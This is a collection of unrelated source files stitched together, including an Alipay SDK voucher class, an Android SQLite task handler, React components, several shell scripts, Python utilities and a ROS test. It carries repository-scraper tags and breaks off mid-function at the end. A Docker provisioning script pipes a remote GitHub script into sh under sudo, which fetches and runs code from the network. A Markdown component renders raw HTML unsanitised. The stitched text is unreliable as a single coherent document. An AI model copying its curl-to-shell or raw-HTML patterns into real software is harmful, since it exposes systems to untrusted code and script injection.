package com.alipay.api.domain;

import java.util.List;

import com.alipay.api.AlipayObject;
import com.alipay.api.internal.mapping.ApiField;
import com.alipay.api.internal.mapping.ApiListField;

/**
 * Detailed information about an Alipay voucher.
 *
 * @author auto create
 * @since 1.0, 2021-07-22 15:25:26
 */
public class VoucherItem extends AlipayObject {

	private static final long serialVersionUID = 1482169224225799688L;

	/**
	 * Time rules during which the voucher can be used.
	 */
	@ApiListField("available_time_rule")
	@ApiField("voucher_time_rule")
	private List<VoucherTimeRule> availableTimeRule;

	/**
	 * Voucher expiration time, format: yyyy-MM-dd HH:mm:ss.
	 */
	@ApiField("expire_time")
	private String expireTime;

	/**
	 * Item information for a single-item voucher.
	 */
	@ApiField("item_info")
	private VoucherSingleItemInfo itemInfo;

	/**
	 * Promotion rules:
	 * 1) spend-threshold type: voucher face value;
	 * 2) discount type: discount rate and per-use cap amount;
	 * 3) reduce-to type: reduce-to amount.
	 */
	@ApiField("promo_info")
	private PromoInfo promoInfo;

	/**
	 * Promotion type, one of three: fixed amount (FIX), discount (DISCOUNT), reduce-to (SPECIAL).
	 */
	@ApiField("promo_type")
	private String promoType;

	/**
	 * Time the user received the voucher, format yyyy-MM-dd HH:mm:ss.
	 */
	@ApiField("receive_time")
	private String receiveTime;

	/**
	 * Start time from which the voucher can be used, format yyyy-MM-dd HH:mm:ss.
	 */
	@ApiField("send_time")
	private String sendTime;

	/**
	 * Voucher template id.
	 */
	@ApiField("template_id")
	private String templateId;

	/**
	 * Minimum spend threshold amount.
	 */
	@ApiField("threshold_amount")
	private String thresholdAmount;

	/**
	 * Time rules during which the voucher cannot be used.
	 */
	@ApiListField("unavailable_time_rule")
	@ApiField("voucher_time_rule")
	private List<VoucherTimeRule> unavailableTimeRule;

	/**
	 * Voucher description.
	 */
	@ApiField("voucher_desc")
	private String voucherDesc;

	/**
	 * Voucher id.
	 */
	@ApiField("voucher_id")
	private String voucherId;

	/**
	 * Voucher name.
	 */
	@ApiField("voucher_name")
	private String voucherName;

	/**
	 * Voucher status: usable (ENABLED), fully redeemed (USED), expired (EXPIRED),
	 * unusable (DISABLED), deleted (DELETE, deprecated).
	 */
	@ApiField("voucher_status")
	private String voucherStatus;

	/**
	 * Voucher type:
	 * 1) merchant storewide voucher (ALIPAY_BIZ_VOUCHER);
	 * 2) merchant single-item voucher (ALIPAY_COMMON_ITEM_VOUCHER).
	 */
	@ApiField("voucher_type")
	private String voucherType;

	public List<VoucherTimeRule> getAvailableTimeRule() {
		return this.availableTimeRule;
	}
	public void setAvailableTimeRule(List<VoucherTimeRule> availableTimeRule) {
		this.availableTimeRule = availableTimeRule;
	}

	public String getExpireTime() {
		return this.expireTime;
	}
	public void setExpireTime(String expireTime) {
		this.expireTime = expireTime;
	}

	public VoucherSingleItemInfo getItemInfo() {
		return this.itemInfo;
	}
	public void setItemInfo(VoucherSingleItemInfo itemInfo) {
		this.itemInfo = itemInfo;
	}

	public PromoInfo getPromoInfo() {
		return this.promoInfo;
	}
	public void setPromoInfo(PromoInfo promoInfo) {
		this.promoInfo = promoInfo;
	}

	public String getPromoType() {
		return this.promoType;
	}
	public void setPromoType(String promoType) {
		this.promoType = promoType;
	}

	public String getReceiveTime() {
		return this.receiveTime;
	}
	public void setReceiveTime(String receiveTime) {
		this.receiveTime = receiveTime;
	}

	public String getSendTime() {
		return this.sendTime;
	}
	public void setSendTime(String sendTime) {
		this.sendTime = sendTime;
	}

	public String getTemplateId() {
		return this.templateId;
	}
	public void setTemplateId(String templateId) {
		this.templateId = templateId;
	}

	public String getThresholdAmount() {
		return this.thresholdAmount;
	}
	public void setThresholdAmount(String thresholdAmount) {
		this.thresholdAmount = thresholdAmount;
	}

	public List<VoucherTimeRule> getUnavailableTimeRule() {
		return this.unavailableTimeRule;
	}
	public void setUnavailableTimeRule(List<VoucherTimeRule> unavailableTimeRule) {
		this.unavailableTimeRule = unavailableTimeRule;
	}

	public String getVoucherDesc() {
		return this.voucherDesc;
	}
	public void setVoucherDesc(String voucherDesc) {
		this.voucherDesc = voucherDesc;
	}

	public String getVoucherId() {
		return this.voucherId;
	}
	public void setVoucherId(String voucherId) {
		this.voucherId = voucherId;
	}

	public String getVoucherName() {
		return this.voucherName;
	}
	public void setVoucherName(String voucherName) {
		this.voucherName = voucherName;
	}

	public String getVoucherStatus() {
		return this.voucherStatus;
	}
	public void setVoucherStatus(String voucherStatus) {
		this.voucherStatus = voucherStatus;
	}

	public String getVoucherType() {
		return this.voucherType;
	}
	public void setVoucherType(String voucherType) {
		this.voucherType = voucherType;
	}

}
/**
 * Returns a copy of the input with every '!' and '.' character removed.
 *
 * @param string the text to filter; must not be null
 * @return the filtered text
 */
public static String remove(String string) {
    StringBuilder filtered = new StringBuilder(string.length());
    for (char c : string.toCharArray()) {
        if (c != '!' && c != '.') {
            filtered.append(c);
        }
    }
    return filtered.toString();
}
import { createDrawerNavigator } from '@react-navigation/drawer'; import FeedDrawer from '../components/feedDrawer'; import Feed from '../pages/feed'; const Drawer = createDrawerNavigator(); const FeedNavigator: React.FC = () => { return ( <Drawer.Navigator drawerContent={() => <FeedDrawer />} screenOptions={{ swipeEnabled: false, }}> <Drawer.Screen component={Feed} name="Feed" options={{ headerShown: false }} /> </Drawer.Navigator> ); }; export default FeedNavigator;
package com.example.todolist.sqlitepackage; import android.content.ContentValues; import android.content.Context; import android.database.Cursor; import android.database.sqlite.SQLiteDatabase; import android.database.sqlite.SQLiteOpenHelper; import android.util.Log; import java.util.ArrayList; import java.util.List; public class MyDbHandler extends SQLiteOpenHelper { // constructor public MyDbHandler(Context context) { super(context, Params.DB_NAME, null, Params.DB_VERSION); } @Override public void onCreate(SQLiteDatabase sqLiteDatabase) { // SQL query to initialize databse String create = "CREATE TABLE " + Params.TABLE_NAME + "(" + Params.KEY_ID + " INTEGER PRIMARY KEY, " + Params.KEY_NAME + " TEXT, " + Params.KEY_DESCRIPTION + " TEXT" + ")"; Log.d("db", "Query: " + create); sqLiteDatabase.execSQL(create); } @Override public void onUpgrade(SQLiteDatabase sqLiteDatabase, int i, int i1) { } // function to add task public void addTask(Task task){ // Getting writable database as we want to add task SQLiteDatabase db = this.getWritableDatabase(); // Initializing values object of class ContentValues and storing values in it ContentValues values = new ContentValues(); values.put(Params.KEY_NAME, task.getName()); values.put(Params.KEY_DESCRIPTION, task.getDescription()); // Inserting inside database db.insert(Params.TABLE_NAME, null, values); Log.d("db", "Successfully inserted!!!"); db.close(); // closing databse } // function to retrieve all task public List<Task> getAllTasks() { // intializing arraylist of type Task List<Task> taskList = new ArrayList<>(); // Getting readable database as we only want to view it SQLiteDatabase db = this.getReadableDatabase(); //Generate the query to read from the database String select = "SELECT * FROM " + Params.TABLE_NAME; // Using a cursor object Cursor cursor = db.rawQuery(select, null); //Looping through it now using the cursor as the end conditon if (cursor.moveToFirst()){ do { Task task = new Task(); 
task.setId(Integer.parseInt(cursor.getString(0))); task.setName(cursor.getString(1)); task.setDescription(cursor.getString(2)); taskList.add(task); } while (cursor.moveToNext()); } return taskList; } // functioon to update any entry public int updateTask(Task task){ // Getting writable database as we want to update task SQLiteDatabase db = this.getWritableDatabase(); // Initializing values object of class ContentValues and storing values in it ContentValues values = new ContentValues(); values.put(Params.KEY_NAME, task.getName()); values.put(Params.KEY_DESCRIPTION, task.getDescription()); // Updating return db.update(Params.TABLE_NAME, values, Params.KEY_ID + "=?", new String[]{String.valueOf(task.getId())}); } // function to delete task by id public void deleteTaskById(int id){ // Getting writable database as we want to delete task SQLiteDatabase db = this.getWritableDatabase(); // deleting db.delete(Params.TABLE_NAME, Params.KEY_ID + "=?", new String[]{String.valueOf(id)}); // closing db.close(); } // function to delete task public void deleteTask(Task task){ // Getting writable database as we want to delete task SQLiteDatabase db = this.getWritableDatabase(); // deleting db.delete(Params.TABLE_NAME, Params.KEY_ID + "=?", new String[]{String.valueOf(task.getId())}); //closing db.close(); } // function to get number of entries in the database public int getCount(){ // SQL query String query = "SELECT * FROM " + Params.TABLE_NAME; // Getting readable database as we are not changing anything SQLiteDatabase db = this.getReadableDatabase(); // using cursor to iterate the query Cursor cursor = db.rawQuery(query, null); //return return cursor.getCount(); } }
# Download the enwik8 Wikipedia dump and preprocess it into the text8 corpus.
# BUG FIX: the original had no error handling, so a failed download or unzip
# still ran the filter and deleted the inputs; stop on the first failure.
set -e
wget http://mattmahoney.net/dc/enwik8.zip
unzip enwik8.zip
perl data/wikifil.pl enwik8 > text8
# Clean up the archive and the raw dump once text8 has been written.
rm -f enwik8.zip enwik8
<filename>chapter06/Exercise_6_22.java package com.company; import java.util.Scanner; public class Exercise_6_22 { public static void main(String[] args) { Scanner input = new Scanner(System.in); System.out.print("Enter a positive number: "); double n = input.nextDouble(); System.out.printf("The square root of %f is %f", n, sqrt(n)); } public static double sqrt(double n) { double lastGuess = 1; double nextGuess = (lastGuess + n/ lastGuess)/2; while (Math.abs(lastGuess - nextGuess) >= 0.0001) { lastGuess = nextGuess; nextGuess = (lastGuess + n/ lastGuess)/2; } return nextGuess; } }
#!/usr/bin/env bash
# Print a greeting that includes the path this script was invoked as.
# BUG FIX: the original `echo hello from $0` left $0 unquoted (word-splits
# on paths containing spaces); printf with a quoted expansion is safe.
printf 'hello from %s\n' "$0"
#! /bin/sh
# Bootstrap Script
# Regenerates the GNU autotools build files for this project.
# Copyright (C) 2019-2021 kaoru https://www.tetengo.org/

# Stop at the first failing tool, matching the original && chain.
set -e
aclocal -I m4
autoheader
libtoolize --copy
automake --add-missing --copy --gnu
autoconf
<gh_stars>0 import React, { FC, memo } from 'react'; import { MarkdownStyle } from './style'; export const Markdown: FC<{ html: string }> = memo(({ html }) => { return <MarkdownStyle dangerouslySetInnerHTML={{ __html: html }} />; });
#!/bin/sh

# Ensure the game jar carries the executable bit, then start it.
chmod +x bridgeconstructor.jar

# Run the application in the foreground via the JVM.
java -jar bridgeconstructor.jar
# Compile and run a cmocka-based tester with two wrapped (mocked) symbols,
# recording the wall-clock runtime of the whole cycle.
# Usage: $0 <folder> <tester.c> <mock1> <mock2> <include-dir>
res1=$(date +%s.%N)

## VARIABLES ##
folder="$1"
tester="$2"
## Mocked functions
# BUG FIX: these assignments were commented out while $mock1/$mock2/$include
# were still used in the gcc line below, so they always expanded empty.
mock1="${3:-}"
mock2="${4:-}"
## Include ##
include="${5:-}"

if [ -d "$folder/output" ]; then
    echo "Diretorio output já existe"
else
    # The original wrapped mkdir in backticks, which pointlessly tried to
    # execute its (empty) output as a command.
    mkdir -p "$folder/output"
    echo "Diretorio output criado"
fi

cd "$folder" || exit 1

# Build with the cmocka wrap flags; compiler errors go to output/rtc_err.txt.
gcc "$tester" -I "$include" -Wl,--wrap="$mock1",--wrap="$mock2" -lcmocka 2> output/rtc_err.txt
# Run the tester; its stderr is captured in output/rtc.txt.
./a.out 2> output/rtc.txt

res2=$(date +%s.%N)
# Break the elapsed seconds into days/hours/minutes/seconds with bc.
dt=$(echo "$res2 - $res1" | bc)
dd=$(echo "$dt/86400" | bc)
dt2=$(echo "$dt-86400*$dd" | bc)
dh=$(echo "$dt2/3600" | bc)
dt3=$(echo "$dt2-3600*$dh" | bc)
dm=$(echo "$dt3/60" | bc)
ds=$(echo "$dt3-60*$dm" | bc)

LC_NUMERIC=C printf "Runtime RTC: %d:%02d:%02d:%02.4f\n" "$dd" "$dh" "$dm" "$ds" >> "./time.txt"
def remove_duplicates(nums):
    """Return a new list with duplicate values removed, preserving the
    first-seen order of the input sequence.

    Membership is checked against the result list, so elements do not
    need to be hashable (O(n^2) worst case, kept for compatibility).
    """
    res = []
    for i in nums:
        if i not in res:
            res.append(i)
    return res


if __name__ == "__main__":
    # BUG FIX: `nums` was never defined, so importing or running this module
    # raised NameError; define sample data and guard the demo behind __main__.
    nums = [1, 2, 2, 3, 1]
    result = remove_duplicates(nums)
    print(result)
<gh_stars>0
// Marker interface for fault payloads; intentionally has no members yet.
// NOTE(review): presumably fields will be added once the fault schema is
// known — confirm the emptiness is intended.
export interface Fault {
}
# BUG FIX: removed the <reponame>/<gh_stars> scraper artifacts that preceded
# the import and made the file unparseable.
from typing import List


class Solution:
    def containsNearbyDuplicate(self, nums: List[int], k: int) -> bool:
        """Return True if nums contains two equal values at most k indices apart.

        Tracks the most recent index of each value in a dict: O(n) time,
        O(n) space.
        """
        number_to_index = {}
        for i, n in enumerate(nums):
            if n in number_to_index and i - number_to_index[n] <= k:
                return True
            number_to_index[n] = i
        return False


s = Solution()
print("Solution 1 : ", s.containsNearbyDuplicate([1, 2, 3, 1], 3))
print("Solution 2 : ", s.containsNearbyDuplicate([1, 0, 1, 1], 1))
print("Solution 3 : ", s.containsNearbyDuplicate([1, 2, 3, 1, 2, 3], 2))
#!/bin/sh
#
# chkconfig: 345 80 20
# description: kestrel is a light-weight queue written in scala
#
# SysV init script: start/stop/restart the kestrel queue daemon.
#
# Source function library.
if [ -f /etc/init.d/functions ] ; then
  . /etc/init.d/functions
elif [ -f /etc/rc.d/init.d/functions ] ; then
  . /etc/rc.d/init.d/functions
else
  exit 0
fi

prog=kestrel
USER=daemon
KESTREL_HOME=/opt/kestrel
VERSION=1.0
JAR=$KESTREL_HOME/kestrel-$VERSION.jar

# Refuse to start without a readable kestrel jar.
if [ ! -r $JAR ]; then
  echo "FAIL"
  echo "*** jar missing - not starting"
  exit 1
fi

PIDFILE=/var/run/${prog}.pid
LOCKFILE=/var/lock/subsys/$prog
HEAP_OPTS="-Xmx2048m -Xms1024m -XX:NewSize=256m"
JAVA_OPTS="-server -verbosegc -XX:+PrintGCDetails -XX:+UseConcMarkSweepGC -XX:+UseParNewGC $HEAP_OPTS"

# Launch kestrel in the background; record its pid and create the lock file.
start() {
  echo -n $"Starting $prog: "
  java $JAVA_OPTS -jar $JAR > /var/log/$prog-startup.log 2>&1 &
  # NOTE(review): $? immediately after backgrounding is always 0, so the
  # failure branch below can never trigger on a bad launch — confirm intended.
  RETVAL=$?
  if [ $RETVAL -eq 0 ]; then
    # $! is the pid of the backgrounded java process.
    echo $! > $PIDFILE
    success $"$prog startup"
    touch $LOCKFILE
  else
    failure $"$prog startup"
  fi
  echo
  return $RETVAL;
}

# Stop the daemon recorded in the pid file and clean up lock/pid files.
stop() {
  echo -n $"Stopping $prog: "
  if [ -f $PIDFILE ]; then
    killproc -p $PIDFILE $prog
    RETVAL=$?
    if [ $RETVAL -eq 0 ]; then
      rm -f $LOCKFILE
      rm -f $PIDFILE
    fi;
  else
    RETVAL=1
    failure;
  fi
  echo
  return $RETVAL;
}

case "$1" in
  start)
    start
    ;;
  stop)
    stop
    ;;
  restart)
    stop
    start
    ;;
  condrestart)
    # Restart only if the service was running (lock file present).
    if [ -f $LOCKFILE ]; then
      stop
      start
    fi
    ;;
  *)
    echo $"Usage: $0 {start|stop|restart|condrestart}"
    exit 1
esac

exit $RETVAL
#!/bin/bash
# Change into the directory containing this script, then start the dev server.
script_location=$(dirname "$0")
echo "$script_location"
# Abort if the directory cannot be entered instead of running npm elsewhere.
cd "$script_location" || exit 1
pwd

# BUG FIX: the original `url = 'http://127.0.0.1:8600/'` is not an assignment
# (spaces around = make the shell run a command named `url`); the address is
# informational only, so keep it as a comment.
# browser url: http://127.0.0.1:8600/
npm run dev
"use strict";

// NOTE: Babel-transpiled Storybook story (generated output). Prefer editing
// the ES-module source; manual changes here may be overwritten by a rebuild.

var _react = _interopRequireDefault(require("react"));

var _react2 = require("@storybook/react");

var _grommet = require("grommet");

var _themes = require("grommet/themes");

// Babel interop helper: wrap CommonJS exports so `.default` always exists.
function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { "default": obj }; }

// Percent-complete values, one table row per value.
var values = [20, 40, 60, 80, 100];

// Story component: a bordered table where each row pairs a bar Meter with a
// "<value>% complete" label.
var MeterInTable = function MeterInTable() { return _react["default"].createElement(_grommet.Grommet, { theme: _themes.grommet }, _react["default"].createElement(_grommet.Box, { align: "center", pad: "large" }, _react["default"].createElement(_grommet.Box, { border: true }, _react["default"].createElement(_grommet.Table, { caption: "Meter Inside Table" }, _react["default"].createElement(_grommet.TableBody, null, values.map(function (val) { return _react["default"].createElement(_grommet.TableRow, null, _react["default"].createElement(_grommet.TableCell, null, _react["default"].createElement(_grommet.Meter, { type: "bar", values: [{ value: val }] })), _react["default"].createElement(_grommet.TableCell, null, _react["default"].createElement(_grommet.Text, null, val, "% complete"))); })))))); };

// Register the story under the 'Table' section.
(0, _react2.storiesOf)('Table', module).add('Meter Inside Table', function () { return _react["default"].createElement(MeterInTable, null); });
#!/bin/bash
# Vagrant provisioning: install a pinned Docker build and let the 'ubuntu'
# user run it without sudo.

sudo mkdir -p /vagrant/data
# sudo ln -s /vagrant/data/docker /var/lib/docker
# sudo cp /vagrant/apt.sources.list /etc/apt/sources.list

echo Installing docker
# Alternative mirror-based install pinned to 1.12.6, kept for reference:
# curl -sSL http://acs-public-mirror.oss-cn-hangzhou.aliyuncs.com/docker-engine/internet | sed 's/apt-get install -y -q docker-engine/apt-get install -y -q docker-engine=1.12.6-0~ubuntu-xenial/g' | sh -
# Pinned Docker 1.13.1 install script fetched from GitHub (raw view).
sudo curl -sSL https://github.com/gitlawr/install-docker/blob/1.0/1.13.1.sh?raw=true | sh
# Group membership takes effect on the user's next login.
sudo usermod -aG docker ubuntu

# Optional registry mirror / HTTP proxy configuration, disabled by default:
# sudo mkdir -p /etc/docker
# sudo tee /etc/docker/daemon.json <<-'EOF'
# {
#    "registry-mirrors": ["https://qtm2k3j2.mirror.aliyuncs.com"]
# }
# EOF
# sudo mkdir -p /etc/systemd/system/docker.service.d
# sudo tee /etc/systemd/system/docker.service.d/http-proxy.conf <<-'EOF'
# [Service]
# Environment="HTTP_PROXY=http://172.22.101.1:1087/"
# EOF

# Reload unit files and restart docker so any configuration above is applied.
sudo systemctl daemon-reload
sudo systemctl restart docker
# Ticket booking form built with Tk.
# Import compatibly: prefer the Python 3 module name, fall back to Python 2's.
try:
    import tkinter as tk
except ImportError:
    import Tkinter as tk

# Create a window
window = tk.Tk()
window.title("Ticket Booking System")

# Create a frame
frame = tk.Frame(window, bd=5)

# Create labels
l_name = tk.Label(frame, text="Name")
l_date = tk.Label(frame, text="Date")
l_time = tk.Label(frame, text="Time")
l_seats = tk.Label(frame, text="Number of Seats")

# Create text boxes
t_name = tk.Entry(frame)
t_date = tk.Entry(frame)
t_time = tk.Entry(frame)
t_seats = tk.Entry(frame)


def on_submit():
    """Collect the form values when Submit is pressed.

    BUG FIX: the original referenced `on_submit` without ever defining it,
    raising NameError when the button was created.
    """
    booking = {
        "name": t_name.get(),
        "date": t_date.get(),
        "time": t_time.get(),
        "seats": t_seats.get(),
    }
    print(booking)


# Create submit button
submit_btn = tk.Button(frame, text="Submit", command=on_submit)

# Add widgets to the frame
l_name.grid(row=0, column=0)
t_name.grid(row=0, column=1)
l_date.grid(row=1, column=0)
t_date.grid(row=1, column=1)
l_time.grid(row=2, column=0)
t_time.grid(row=2, column=1)
l_seats.grid(row=3, column=0)
t_seats.grid(row=3, column=1)
submit_btn.grid(row=4, column=1)

# Set size of the frame
frame.grid(row=0, column=0)

# Start the main loop
window.mainloop()
#!/bin/sh
#########################################################
#                                                       #
#   Name: Deploy Certificates                           #
#   Author: Diego Castagna (diegocastagna.com)          #
#   Description: Deploy certificates using certbot      #
#   License: diegocastagna.com/license                  #
#                                                       #
#########################################################

domains=""
serverType="--nginx"

# Checking if I'm root
if [ "$(id -u)" -ne 0 ]; then
    printf "This script must be run as root\n"
    exit 1
fi

# BUG FIX: `read -p` is a bashism not guaranteed under #!/bin/sh; print the
# prompt with printf instead. certbot's -d flag expects a comma-separated
# list, so normalize any spaces the user typed into commas.
printf "Enter all the domains for the certificate separated by commas ',' (leave blank to exit): "
read domains
if [ -z "$domains" ]; then
    exit 0
fi
domains=$(printf '%s' "$domains" | tr ' ' ',')

# NOTE(review): a www-data group is taken as an Apache signal here, but on
# Debian nginx commonly uses www-data too — confirm this heuristic.
if [ "$(getent group www-data)" ]; then
    serverType="--apache"
fi

certbot "$serverType" -n --agree-tos -d "$domains"
def delete(root, key):
    """Delete `key` from the BST rooted at `root` and return the new root.

    Nodes are expected to expose `data`, `left` and `right` attributes.
    Missing keys leave the tree unchanged.
    """
    # base case: empty subtree
    if root is None:
        return None

    # searching for the node
    if root.data > key:
        root.left = delete(root.left, key)
    elif root.data < key:
        root.right = delete(root.right, key)
    else:
        # Node with only one child or no child: splice it out.
        if root.left is None:
            return root.right
        if root.right is None:
            return root.left

        # Node with two children: get the inorder successor (smallest
        # in the right subtree) and copy its value here.
        successor = _min_value_node(root.right)
        root.data = successor.data
        # BUG FIX: the original recursed with the successor NODE instead of
        # its key (delete(root.right, temp)), so the comparison `data > temp`
        # raised TypeError and the duplicate was never removed.
        root.right = delete(root.right, successor.data)
    return root


def _min_value_node(node):
    """Return the leftmost (minimum) node of a non-empty subtree."""
    while node.left is not None:
        node = node.left
    return node
<reponame>smagill/opensphere-desktop
package io.opensphere.auxiliary.video;

import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;

import org.apache.log4j.Logger;

import io.opensphere.core.util.io.StreamReader;

/**
 * Utility class for extracting the Xuggler native libraries.
 *
 * Copies the OS-appropriate native libraries from the jar's resources into a
 * temp directory and (on Windows) pre-loads the runtime DLLs Xuggler depends on.
 */
public final class XugglerNativeUtilities
{
    /** Logger reference. */
    private static final Logger LOGGER = Logger.getLogger(XugglerNativeUtilities.class);

    /** True when extracting the native libraries has been attempted. */
    private static boolean ourExplodeAttempted;

    /**
     * Extract the native libraries(s) from the jar and put them in a place
     * where Xuggler can use them. Safe to call repeatedly; only the first
     * call does any work (guarded by ourExplodeAttempted, method is
     * synchronized).
     */
    public static synchronized void explodeXugglerNatives()
    {
        if (!ourExplodeAttempted)
        {
            ourExplodeAttempted = true;

            // Create the directory to store the libs if necessary.
            String outPath = System.getProperty("java.io.tmpdir") + File.separator + "XugglerNative";
            File outputDir = new File(outPath);
            if (!outputDir.exists() && !outputDir.mkdir())
            {
                // Cannot create the target directory; silently give up.
                return;
            }

            // Add the location to the java.library.path so that Xuggler can
            // find the libs.
            // NOTE(review): java.library.path is typically cached by the JVM at
            // startup, so setting it here may not affect System.loadLibrary —
            // confirm Xuggler reads the property directly.
            String pathVar = System.getProperty("java.library.path", "");
            StringBuilder pathBuilder = new StringBuilder(pathVar);
            if (!pathVar.isEmpty())
            {
                pathBuilder.append(System.getProperty("path.separator"));
            }
            pathBuilder.append(outPath);
            System.setProperty("java.library.path", pathBuilder.toString());

            // extract the libs for the correct OS
            String osName = System.getProperty("os.name");
            if (osName.contains("Windows"))
            {
                boolean amd64 = "amd64".equals(System.getProperty("os.arch"));
                String prefix = amd64 ? "win32/x86_64/" : "win32/x86/";
                // MinGW runtime flavor differs per arch: SEH on x86_64, SJLJ on x86.
                String libgcc = amd64 ? "libgcc_s_seh-1.dll" : "libgcc_s_sjlj-1.dll";
                // Load order matters: libgcc first, then libstdc++.
                explodeLib(prefix, outputDir, libgcc);
                System.load(outPath + File.separator + libgcc);
                explodeLib(prefix, outputDir, "libstdc++-6.dll");
                System.load(outPath + File.separator + "libstdc++-6.dll");

                // We do not need to load this, Xuggler will do it for us.
                explodeLib(prefix, outputDir, "libxuggle-5.dll");
            }
            else
            {
                // Non-Windows: only the Linux x86_64 shared object is bundled.
                explodeLib("linux/x86_64/", outputDir, "libxuggle.so");
            }
        }
    }

    /**
     * Extract the library from the path location and write it to a file in the
     * given location.
     *
     * @param libResourcePrefix The resource path where the library currently
     *            resides.
     * @param outputDir The directory where the library should be written.
     * @param libName The name of the library in the output location.
     */
    private static void explodeLib(String libResourcePrefix, File outputDir, String libName)
    {
        try (InputStream libStream = XugglerNativeUtilities.class.getClassLoader()
                .getResourceAsStream(libResourcePrefix + libName))
        {
            // Always write the file in case a new version is deployed
            File libFile = new File(outputDir.getAbsolutePath() + File.separator + libName);
            try (FileOutputStream libOutput = new FileOutputStream(libFile))
            {
                StreamReader reader = new StreamReader(libStream);
                reader.readStreamToOutputStream(libOutput);
            }
        }
        catch (IOException e)
        {
            // Extraction failure is logged but not fatal; Xuggler will fail
            // later if the library is actually required.
            LOGGER.error("Failed to extract xuggler native library." + e, e);
        }
    }

    /** Disallow instantiation. */
    private XugglerNativeUtilities()
    {
    }
}
# testDCOM
usage = """\
testDCOM.py - Simple DCOM test

Usage: testDCOM.py serverName

Attempts to start the Python.Interpreter object on the named machine,
and checks that the object is indeed running remotely.

Requires the named server be configured to run DCOM (using dcomcnfg.exe),
and the Python.Interpreter object installed and registered on that machine.

The Python.Interpreter object must be installed on the local machine,
but no special DCOM configuration should be necessary.
"""

# NOTE: If you configured the object locally using dcomcnfg, you could
# simply use Dispatch rather than DispatchEx.
# MODERNIZATION: the deprecated string-module functions (string.lower) were
# replaced with str methods; the string module's function forms were removed
# in Python 3 while this file already uses Python 3 print().
import pythoncom, win32com.client, win32api, sys


def test(serverName):
    """Start Python.Interpreter on serverName and verify it runs remotely."""
    if serverName.lower() == win32api.GetComputerName().lower():
        print("You must specify a remote server name, not the local machine!")
        return

    # Hack to overcome a DCOM limitation. As the Python.Interpreter object
    # is probably installed locally as an InProc object, DCOM seems to ignore
    # all settings, and use the local object.
    clsctx = pythoncom.CLSCTX_SERVER & ~pythoncom.CLSCTX_INPROC_SERVER
    ob = win32com.client.DispatchEx("Python.Interpreter", serverName, clsctx=clsctx)
    ob.Exec("import win32api")
    actualName = ob.Eval("win32api.GetComputerName()")
    if serverName.lower() != actualName.lower():
        print("Error: The object created on server '%s' reported its name as '%s'" % (serverName, actualName))
    else:
        print("Object created and tested OK on server '%s'" % serverName)


if __name__ == '__main__':
    if len(sys.argv) == 2:
        test(sys.argv[1])
    else:
        print(usage)
def _backwardCompat(result_json): bc_json = dict() for k, v in result_json.items(): if isinstance(v, dict): bc_json[k[0].lower() + k[1:]] = _backwardCompat(v) elif k == 'Token': bc_json['sessionToken'] = v else: bc_json[k[0].lower() + k[1:]] = v return bc_json # Example usage input_json = { 'Name': 'John', 'Details': { 'Age': 30, 'Address': { 'City': 'New York', 'ZipCode': '10001' } }, 'Token': 'abc123' } backward_compatible_json = _backwardCompat(input_json) print(backward_compatible_json)
#!/usr/bin/env python
import time

import pytest
import rospy
from geometry_msgs.msg import TwistStamped
from control_msgs.msg import JointJog
from std_msgs.msg import Int8

# Import common Python test utilities
from os import sys, path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
import util

# The robot starts at a singular position (see config file).
# The jogger should halt and publish a warning.
# Listen for a warning message from the jogger.
# This can be run as part of a pytest, or like a normal ROS executable:
# rosrun moveit_jog_arm test_jog_arm_halt_msg.py

CARTESIAN_JOG_COMMAND_TOPIC = 'jog_server/delta_jog_cmds'

# jog_arm should publish a nonzero warning code here
STATUS_TOPIC = 'jog_server/status'


@pytest.fixture
def node():
    return rospy.init_node('pytest', anonymous=True)


class CartesianJogCmd(object):
    """Publishes Cartesian jog commands as TwistStamped messages."""

    def __init__(self):
        self._pub = rospy.Publisher(
            CARTESIAN_JOG_COMMAND_TOPIC, TwistStamped, queue_size=10
        )

    def send_cmd(self, linear, angular):
        ts = TwistStamped()
        ts.header.stamp = rospy.Time.now()
        ts.twist.linear.x, ts.twist.linear.y, ts.twist.linear.z = linear
        ts.twist.angular.x, ts.twist.angular.y, ts.twist.angular.z = angular
        self._pub.publish(ts)


def test_jog_arm_halt_msg(node):
    assert util.wait_for_jogger_initialization()

    received = []
    # BUG FIX: store the Int8 payload (msg.data), not the message object.
    # The original appended the message itself, so `i != 0` below compared an
    # object to 0 and was always true — the warning-code check could not fail.
    sub = rospy.Subscriber(
        STATUS_TOPIC, Int8, lambda msg: received.append(msg.data)
    )
    cartesian_cmd = CartesianJogCmd()

    # This nonzero command should produce jogging output
    # A subscriber in a different timer fills `received`
    TEST_DURATION = 1
    start_time = rospy.get_rostime()
    received = []
    while (rospy.get_rostime() - start_time).to_sec() < TEST_DURATION:
        cartesian_cmd.send_cmd([1, 1, 1], [0, 0, 1])
        time.sleep(0.1)

    # Check the received messages
    # A non-zero value signifies a warning
    assert len(received) > 3
    assert any(i != 0 for i in received[-3:])


if __name__ == '__main__':
    node = node()
    test_jog_arm_halt_msg(node)
#include "killcovidrun.h"
#include <Utils/jsonio.h>

/**
 * \file killcovidrun.cpp
 * \brief Implementation of the KillCovid-specific Game Run.
 * \author <NAME>
 */

// BUG FIX: the default and path constructors left `score` uninitialized,
// so getScore()/lessThan() could read an indeterminate value.
KillCovidRun::KillCovidRun() : score(0) {}

KillCovidRun::KillCovidRun(const QString& path) : BaseRun(path), score(0) {}

KillCovidRun::KillCovidRun(int score) : score(score) {}

// Orders runs by score; on a tie the more recent run compares smaller.
bool KillCovidRun::lessThan(const BaseRun *rhs) {
    KillCovidRun* other = (KillCovidRun *) rhs;
    if (this->score == other->score) {
        return this->datetime > other->datetime;
    } else {
        return this->score < other->score;
    }
}

// Serializes this run to JSON at `path`; datetime is stored as a numeric string.
int KillCovidRun::toJson() {
    QJsonObject killCovidRun;
    killCovidRun["datetime"] = QString::number(this->datetime);
    killCovidRun["player_name"] = this->playerName;
    killCovidRun["score"] = this->score;
    return JsonIO::writeObject(killCovidRun, path);
}

// Loads this run from the JSON file at `path`; returns JsonIO's error code.
int KillCovidRun::fromJson() {
    QJsonObject killCovidRun;
    int errorCode = JsonIO::readObject(killCovidRun, path);
    this->datetime = killCovidRun["datetime"].toString().toULongLong();
    this->playerName = killCovidRun["player_name"].toString();
    this->score = killCovidRun["score"].toInt();
    return errorCode;
}

int KillCovidRun::getScore() {
    return this->score;
}
<reponame>NaKolenke/kolenka-backend
import datetime

import pytest

from src.model.models import Tag, TagMark


@pytest.fixture
def tag(post):
